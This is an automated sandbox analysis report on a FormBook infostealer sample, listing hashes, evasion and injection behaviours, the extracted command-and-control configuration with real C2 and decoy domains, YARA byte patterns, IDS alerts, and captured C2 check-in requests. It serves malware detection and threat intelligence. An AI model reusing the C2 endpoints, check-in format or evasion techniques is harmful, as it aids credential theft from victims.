Windows Analysis Report ClgNlmU3Is.exe

Overview

General Information

Sample Name: ClgNlmU3Is.exe
Analysis ID: 502318
MD5: 2fe634ab1348a94f5a2f8712d8b4ee44
SHA1: 1c6e453bc403da0ae1ea75f96ab90cdf86472665
SHA256: 9136c283e5029c2f073b706014f6f73b67ead84450267cb5ce0dd26cbcecaa25
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • ClgNlmU3Is.exe (PID: 2884 cmdline: 'C:\Users\user\Desktop\ClgNlmU3Is.exe' MD5: 2FE634AB1348A94F5A2F8712D8B4EE44)
    • ClgNlmU3Is.exe (PID: 5744 cmdline: C:\Users\user\Desktop\ClgNlmU3Is.exe MD5: 2FE634AB1348A94F5A2F8712D8B4EE44)
    • ClgNlmU3Is.exe (PID: 1340 cmdline: C:\Users\user\Desktop\ClgNlmU3Is.exe MD5: 2FE634AB1348A94F5A2F8712D8B4EE44)
      • explorer.exe (PID: 3292 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • control.exe (PID: 1808 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
          • cmd.exe (PID: 5700 cmdline: /c del 'C:\Users\user\Desktop\ClgNlmU3Is.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.esyscoloradosprings.com/fqiq/"], "decoy": ["driventow.com", "ipatchwork.today", "bolder.equipment", "seal-brother.com", "mountlaketerraceapartments.com", "weeden.xyz", "sanlifalan.com", "athafood.com", "isshinn1.com", "creationslazzaroni.com", "eclecticrenaissancewoman.com", "satellitephonstore.com", "cotchildcare.com", "yamacorp.digital", "ff4cuno43.xyz", "quicksticks.community", "govindfinance.com", "farmersfirstseed.com", "megacinema.club", "tablescaperendezvous4two.com", "ecarehomes.com", "floaterslaser.com", "benisano.com", "saint444.com", "thedusi.com", "avafxtrade.online", "hanenosuke.com", "suntioil4u.com", "healthyweekendtips.com", "24000words.com", "ofbchina.net", "begukiu0.info", "wolmoda.com", "mask60.com", "4bellemaison.com", "mambacustomboats.com", "sedsn.com", "doggycc.com", "kangrungao.com", "pharmacistcharisma.com", "passiverewardssystems.com", "qywyfeo8.xyz", "shenjiclass.com", "rdoi.top", "lavishbynovell.com", "fleetton.com", "hillcresthomegroup.com", "hartfulcleaning.com", "srofkansas.com", "applebroog.industries", "phillytrainers.com", "dmc--llc.com", "sosoon.store", "daysyou.com", "controldatasa.com", "markarge.com", "hirayaawards.com", "clinicscluster.com", "sophiagunterman.art", "kirtansangeet.com", "residential.insure", "ribbonofficial.com", "qianhaijcc.com", "fytvankin.quest"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000005.00000002.345807116.0000000000EA0000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000005.00000002.345807116.0000000000EA0000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.345807116.0000000000EA0000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x16ae9:$sqlite3step: 68 34 1C 7B E1
  • 0x16bfc:$sqlite3step: 68 34 1C 7B E1
  • 0x16b18:$sqlite3text: 68 38 2A 90 C5
  • 0x16c3d:$sqlite3text: 68 38 2A 90 C5
  • 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000000.318011069.000000000E059000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000007.00000000.318011069.000000000E059000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x46c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x41b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x47c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0xac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
5.2.ClgNlmU3Is.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
5.2.ClgNlmU3Is.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.ClgNlmU3Is.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x15ce9:$sqlite3step: 68 34 1C 7B E1
  • 0x15dfc:$sqlite3step: 68 34 1C 7B E1
  • 0x15d18:$sqlite3text: 68 38 2A 90 C5
  • 0x15e3d:$sqlite3text: 68 38 2A 90 C5
  • 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x15e53:$sqlite3blob: 68 53 D8 7F 8C
5.2.ClgNlmU3Is.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
5.2.ClgNlmU3Is.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000000.00000002.263533498.0000000003889000.00000004.00000001.sdmp | Malware Configuration Extractor: FormBook (C2 list and decoy domains as listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: ClgNlmU3Is.exe | Virustotal: Detection: 12%
Source: ClgNlmU3Is.exe | ReversingLabs: Detection: 14%
Yara detected FormBook
Source: Yara match | File source: 5.2.ClgNlmU3Is.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.ClgNlmU3Is.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.ClgNlmU3Is.exe.39f3c40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.ClgNlmU3Is.exe.39a9e20.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.345807116.0000000000EA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.318011069.000000000E059000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.345863832.0000000000ED0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.263533498.0000000003889000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.521138198.00000000004B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.345176789.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.299864210.000000000E059000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.525770741.0000000002E10000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.524773419.0000000002B10000.00000040.00020000.sdmp, type: MEMORY
Source: 5.2.ClgNlmU3Is.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: ClgNlmU3Is.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: ClgNlmU3Is.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: control.pdb | source: ClgNlmU3Is.exe, 00000005.00000002.345644202.0000000000CA9000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdbUGP | source: ClgNlmU3Is.exe, 00000005.00000002.346109606.000000000105F000.00000040.00000001.sdmp, control.exe, 00000012.00000002.527412025.00000000047AF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: ClgNlmU3Is.exe, 00000005.00000002.346109606.000000000105F000.00000040.00000001.sdmp, control.exe
Source: Binary string: control.pdbUGP | source: ClgNlmU3Is.exe, 00000005.00000002.345644202.0000000000CA9000.00000004.00000020.sdmp
Source: C:\Users\user\Desktop\ClgNlmU3Is.exe | Code function: 4x nop then pop ebx | 5_2_00406AB9
Source: C:\Windows\SysWOW64\control.exe | Code function: 4x nop then pop ebx | 18_2_02E16AB9

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49801 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49801 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49801 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49804 -> 74.220.199.6:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49804 -> 74.220.199.6:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49804 -> 74.220.199.6:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49823 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49823 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49823 -> 34.102.136.180:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Domain query: www.seal-brother.com
Source: C:\Windows\explorer.exe | Network Connect: 151.106.119.144 80
Source: C:\Windows\explorer.exe | Domain query: www.qywyfeo8.xyz
Source: C:\Windows\explorer.exe | Domain query: www.athafood.com
Source: C:\Windows\explorer.exe | Network Connect: 74.220.199.6 80
Source: C:\Windows\explorer.exe | Domain query: www.doggycc.com
Source: C:\Windows\explorer.exe | Network Connect: 185.230.60.102 80
Source: C:\Windows\explorer.exe | Domain query: www.eclecticrenaissancewoman.com
Source: C:\Windows\explorer.exe | Domain query: www.tablescaperendezvous4two.com
Source: C:\Windows\explorer.exe | Domain query: www.hartfulcleaning.com
Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe | Network Connect: 59.106.13.53 80
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe | DNS query: www.qywyfeo8.xyz
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.esyscoloradosprings.com/fqiq/
Source: Joe Sandbox View | ASN Name: WIX_COMIL
Source: Joe Sandbox View | ASN Name: PLUSSERVER-ASN1DE
Source: global traffic | HTTP traffic detected: GET /fqiq/?Hb08=6JOAu55Y8Xzp5was3x3zF3lJbu5eEm2HTNz3vpdd7KIK0WEVLfillQ9z+rMr7mc/lcAimk0NkA==&s6=z484 HTTP/1.1 | Host: www.tablescaperendezvous4two.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /fqiq/?Hb08=tdw/kGifcRQg4xawfHQmMwAAiMBNQnR2khC/NrDNjqaKgTZ0vjz3oBz05sNQvFL8j7TnHhbqsg==&s6=z484 HTTP/1.1 | Host: www.doggycc.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /fqiq/?Hb08=uHvuYmjgw/ClkyRj1Ej7vtyQWzU3HFRSMqPjxcCXctDPT+ZSz8NKmBzsVhzcWgEZit3oXGWMXw==&s6=z484 HTTP/1.1 | Host: www.hartfulcleaning.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /fqiq/?Hb08=r0/ZbJthoN4UODxp6ktEAad/47kkdxrfw2EOWc1ElJDlJlQ4qxy1M7DmODdfHJyPJG8yEJi/Mg==&s6=z484 HTTP/1.1 | Host: www.eclecticrenaissancewoman.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /fqiq/?Hb08=mnFbYCr8dRmDLyqklk1rPiA6Of2qOAThWl37YLVanslLOc89q6CMhoedr+7sZO9vcU+qRF0rgQ==&s6=z484 HTTP/1.1 | Host: www.seal-brother.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /fqiq/?Hb08=whGcnAY+p5z1rRe/fmSdvfSEJoFYodGcl+5aIh9wENe/LQ+yrONZ1XbZa9wseLnSfrq3uQOSsg==&s6=z484 HTTP/1.1 | Host: www.athafood.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /fqiq/?Hb08=LbdaYrSuq7QDvfsS7oVDq2uzukwE8JpfT8hIBAsO2A/TzW5xSQi4YlBQHFWhJAqsjukGZieEfA==&s6=z484 HTTP/1.1 | Host: www.farmersfirstseed.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 185.230.60.102
Source: Joe Sandbox View | IP Address: 74.220.199.6
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: openresty | Date: Wed, 13 Oct 2021 17:49:57 GMT | Content-Type: text/html | Content-Length: 275 | ETag: "615f9601-113" | Via: 1.1 google | Connection: close | Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: openresty | Date: Wed, 13 Oct 2021 17:50:02 GMT | Content-Type: text/html | Content-Length: 275 | ETag: "615f93b1-113" | Via: 1.1 google | Connection: close | Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: openresty | Date: Wed, 13 Oct 2021 17:50:35 GMT | Content-Type: text/html | Content-Length: 275 | ETag: "615f9601-113" | Via: 1.1 google | Connection: close | Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: ClgNlmU3Is.exe, 00000000.00000002.266637051.0000000006A72000.00000004.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: ClgNlmU3Is.exe, 00000000.00000002.266637051.0000000006A72000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000007.00000000.270713546.0000000006840000.00000004.00000001.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: control.exe, 00000012.00000002.531021595.0000000004D42000.00000004.00020000.sdmp | String found in binary or memory: http://www.bluehost.com/
Source: control.exe, 00000012.00000002.531021595.0000000004D42000.00000004.00020000.sdmp | String found in binary or memory: http://www.bluehost.com/cgi-bin/partner
Source: control.exe, 00000012.00000002.531021595.0000000004D42000.00000004.00020000.sdmp | String found in binary or memory: http://www.bluehost.com/cgi/help
Source: control.exe, 00000012.00000002.531021595.0000000004D42000.00000004.00020000.sdmp | String found in binary or memory: http://www.bluehost.com/cgi/info/about_us
Source: control.exe, 00000012.00000002.531021595.0000000004D42000.00000004.00020000.sdmp | String found in binary or memory: http://www.bluehost.com/cgi/info/awards
Source: control.exe, 00000012.00000002.531021595.0000000004D42000.00000004.00020000.sdmp | String found in binary or memory: http://www.bluehost.com/cgi/info/contact_us
Source: control.exe, 00000012.00000002.531021595.0000000004D42000.00000004.00020000.sdmp | String found in binary or memory: http://www.bluehost.com/cgi/terms
Source: ClgNlmU3Is.exe, 00000000.00000003.253345811.0000000005784000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coma
Source: ClgNlmU3Is.exe, 00000000.00000003.254086293.0000000005776000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comadi?
Source: ClgNlmU3Is.exe, 00000000.00000003.254086293.0000000005776000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comech
Source: ClgNlmU3Is.exe, 00000000.00000002.266637051.0000000006A72000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: ClgNlmU3Is.exe, 00000000.00000002.263162009.0000000002881000.00000004.00000001.sdmp | String found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
Source: ClgNlmU3Is.exe, 00000000.00000003.255235267.000000000577A000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: ClgNlmU3Is.exe, 00000000.00000002.266637051.0000000006A72000.00000004.00000001.sdmp, ClgNlmU3Is.exe, 00000000.00000002.262998443.0000000000FC7000.00000004.00000040.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: ClgNlmU3Is.exe, 00000000.00000002.266637051.0000000006A72000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: ClgNlmU3Is.exe, 00000000.00000002.266637051.0000000006A72000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: ClgNlmU3Is.exe, 00000000.00000002.266637051.0000000006A72000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: ClgNlmU3Is.exe, 00000000.00000002.266637051.0000000006A72000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: ClgNlmU3Is.exe, 00000000.00000002.266637051.0000000006A72000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: ClgNlmU3Is.exe, 00000000.00000002.266637051.0000000006A72000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: ClgNlmU3Is.exe, 00000000.00000003.255235267.000000000577A000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comFJ
Source: ClgNlmU3Is.exe, 00000000.00000002.266217159.0000000005778000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comaC
Source: ClgNlmU3Is.exe, 00000000.00000003.255235267.000000000577A000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comalic
Source: ClgNlmU3Is.exe, 00000000.00000003.255235267.000000000577A000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comalicX
Source: ClgNlmU3Is.exe, 00000000.00000003.255235267.000000000577A000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comituo
Source: ClgNlmU3Is.exe, 00000000.00000002.266637051.0000000006A72000.00000004.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: ClgNlmU3Is.exe, 00000000.00000002.266637051.0000000006A72000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: ClgNlmU3Is.exe, 00000000.00000003.253105529.0000000005781000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/
Source: ClgNlmU3Is.exe, 00000000.00000002.266637051.0000000006A72000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: ClgNlmU3Is.exe, 00000000.00000002.266637051.0000000006A72000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: ClgNlmU3Is.exe, 00000000.00000002.266637051.0000000006A72000.00000004.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: ClgNlmU3Is.exe, 00000000.00000002.266637051.0000000006A72000.00000004.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: ClgNlmU3Is.exe, 00000000.00000002.266637051.0000000006A72000.00000004.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: control.exe, 00000012.00000002.531021595.0000000004D42000.00000004.00020000.sdmp | String found in binary or memory: http://www.iyfubh.com/?dn=eclecticrenaissancewoman.com&pid=9POJB64QD
Source: ClgNlmU3Is.exe, 00000000.00000003.254086293.0000000005776000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: ClgNlmU3Is.exe, 00000000.00000003.254356959.0000000005779000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/4
Source: ClgNlmU3Is.exe, 00000000.00000003.254086293.0000000005776000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/?
Source: ClgNlmU3Is.exe, 00000000.00000003.254086293.0000000005776000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/C
Source: ClgNlmU3Is.exe, 00000000.00000003.254086293.0000000005776000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/J
Source: ClgNlmU3Is.exe, 00000000.00000003.253743859.0000000005773000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/Q
Source: ClgNlmU3Is.exe, 00000000.00000003.254086293.0000000005776000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/Sue
Source: ClgNlmU3Is.exe, 00000000.00000003.254356959.0000000005779000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0icg
Source: ClgNlmU3Is.exe, 00000000.00000003.254086293.0000000005776000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: ClgNlmU3Is.exe, 00000000.00000003.254086293.0000000005776000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/Q
Source: ClgNlmU3Is.exe, 00000000.00000003.254086293.0000000005776000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/X
Source: ClgNlmU3Is.exe, 00000000.00000003.254356959.0000000005779000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/p
Source: ClgNlmU3Is.exe, 00000000.00000003.254086293.0000000005776000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/u
Source: ClgNlmU3Is.exe, 00000000.00000002.266637051.0000000006A72000.00000004.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: ClgNlmU3Is.exe, 00000000.00000002.266637051.0000000006A72000.00000004.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: ClgNlmU3Is.exe, 00000000.00000002.266637051.0000000006A72000.00000004.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: ClgNlmU3Is.exe, 00000000.00000002.266637051.0000000006A72000.00000004.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: ClgNlmU3Is.exe, 00000000.00000002.266637051.0000000006A72000.00000004.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: ClgNlmU3Is.exe, 00000000.00000002.266637051.0000000006A72000.00000004.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: ClgNlmU3Is.exe, 00000000.00000002.266637051.0000000006A72000.00000004.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: unknown | DNS traffic detected: queries for: www.qywyfeo8.xyz
          Source: global traffic | HTTP traffic detected: GET /fqiq/?Hb08=6JOAu55Y8Xzp5was3x3zF3lJbu5eEm2HTNz3vpdd7KIK0WEVLfillQ9z+rMr7mc/lcAimk0NkA==&s6=z484 HTTP/1.1; Host: www.tablescaperendezvous4two.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii: (empty, the seven raw bytes are NUL)
          Source: global traffic | HTTP traffic detected: GET /fqiq/?Hb08=tdw/kGifcRQg4xawfHQmMwAAiMBNQnR2khC/NrDNjqaKgTZ0vjz3oBz05sNQvFL8j7TnHhbqsg==&s6=z484 HTTP/1.1; Host: www.doggycc.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii: (empty, the seven raw bytes are NUL)
          Source: global traffic | HTTP traffic detected: GET /fqiq/?Hb08=uHvuYmjgw/ClkyRj1Ej7vtyQWzU3HFRSMqPjxcCXctDPT+ZSz8NKmBzsVhzcWgEZit3oXGWMXw==&s6=z484 HTTP/1.1; Host: www.hartfulcleaning.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii: (empty, the seven raw bytes are NUL)
          Source: global traffic | HTTP traffic detected: GET /fqiq/?Hb08=r0/ZbJthoN4UODxp6ktEAad/47kkdxrfw2EOWc1ElJDlJlQ4qxy1M7DmODdfHJyPJG8yEJi/Mg==&s6=z484 HTTP/1.1; Host: www.eclecticrenaissancewoman.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii: (empty, the seven raw bytes are NUL)
